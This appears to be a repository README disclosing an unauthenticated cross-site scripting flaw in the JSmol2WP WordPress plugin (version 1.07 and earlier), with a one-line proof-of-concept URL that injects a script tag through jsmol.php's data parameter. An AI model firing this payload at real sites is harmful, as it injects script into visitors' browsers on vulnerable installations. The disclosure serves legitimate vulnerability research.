.. | |||
README.md | Loading last commit info... |
README.md
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
Description
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
Proof of Concept
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert(/xss/)%3C/script%3E&mimetype=text/html;%20charset=utf-8
References
https://wpscan.com/vulnerability/0bbf1542-6e00-4a68-97f6-48a7790d1c3e